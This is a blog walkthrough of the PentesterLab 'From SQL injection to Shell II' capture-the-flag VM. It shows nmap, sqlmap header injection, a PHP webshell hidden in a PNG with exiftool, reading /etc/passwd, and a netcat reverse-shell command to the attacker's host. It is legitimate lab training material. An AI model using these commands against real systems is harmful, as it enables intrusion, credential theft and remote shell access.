Hello friends!! Today we are
going to solve another CTF challenge “From SQL injection to Shell II” and you can
read part 1 form here. This
VM is developed by Pentester Lab. You
can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/
Install the iso image in VM
ware and start it. The task given in this lab is to gain access of
administration console and upload PHP webshell.
Level:
Intermidate
Penetrating Methodologies
§
Network Scanning (Nmap)
§
Vulnerable to Blind Time-Base SQL Injection
§
Exploiting SQL Injection (SQLMAP)
§
Hiding web shell inside Image (exiftool)
§
Uploading Web shell
§
Spawning Shell (Netcat)
Walkthrough
The target holds
192.168.1.102 as network IP; now using nmap lets find out open ports.
nmap -A 192.168.1.102
Since port for HTTP is open, so we explored target IP in the
web browser and welcome by My Awesome Photoblog web page. It contains some
tags: home; test; ruxcon; 2010; all pictures; admin. Click on test.
The given URL: http://192.168.1.102/cat.php?id=1 will run
sql query for ID 1 now let try to find out whether the above URL is vulnerable
to sql injection or not by adding(‘) apostrophe at last of URL:
Unfortunately this page is not vulnerable to error base SQL
injection as author already mention here you will learn “Blind SQL injection
exploitation using time-based exploitation Gaining code execution using a PHP
webshell”
Then I had used acunetix to scan the target which has
declared the level of threat is high for blind sql injection.
Hence it is clear that exploit the target through sql
injection.
And after little more research work I found the way to
exploit it using sqlmap.
sqlmap -u
http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” --dbs
--dump-all--batch
If you remembered the title of web page was “An Awesome
Photoblog” hence name of database must be photoblog.
Now let’s fetch entire data under photoblog database through
following command:
sqlmap -u
http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” -D photoblog
--dump-all--batch
Now try to use above credential to access administration
console, again open target IP: 192.168.0.105 in browser and click on login tab
and type login as admin and password as P4ssw0rd.
Congrats!!! The first
task is completed.
Now last task is to upload PHP webshell. Under
administration console you will see a link Add a new picture to upload an image
in this web server. Click on Add a new picture to upload image.
I tried to upload php malicious file using .php extension; double
extension .php.jpg; also used case sensitive extension like PHP, pHP but every
time failed to upload backdoor and following web page gets open.
Then I use exiftool to bind a malicious php file which will
generate a remote code execution vulnerability, once get uploaded. To perform
this I downloaded an image “1.png”
and copied simple-backdoor.php from
this path: /usr/share/webshells/php/ on the desktop for binding it with
downloaded image.
Now type command for exiftool to hide malicious code of php
file inside the png image.
cd Desktop
exiftool
“-comment<= simple-backdoor.php” 1.png
exiftool 1.png
As you can observe, the malicious code is hidden inside the
image.
Now I had browse 1.png
to add it as new image which is our php webshell.
Our malicious file successfully uploaded on web server. You
can see a new row is added as webshell php which contains our php backdoor, now
click on backdoor.
Yuppie we have uploaded the image with hidden backdoor
inside, now try execute it.
After inspecting its source code we found link uploaded
image, now let’s try to open it.
As we knew the image contain a web shell that will allow
remote code execution, therefore, after exploring above enumerated path, I try
to get /etc/passwd file.
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/password
And you can observe, we have successfully pulled the passwd
file successfully, hence now can spwan victim’s shell through it.
Let’s run netcat listener in the terminal and execute netcat
reverse connection for spawning web shell.
nc -lvp 1234
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc
192.168.1.105 6666 -e /bin/sh
Superb!!! We completed our last challenge also here we have
spawned victim web shell.
0 comments:
Post a Comment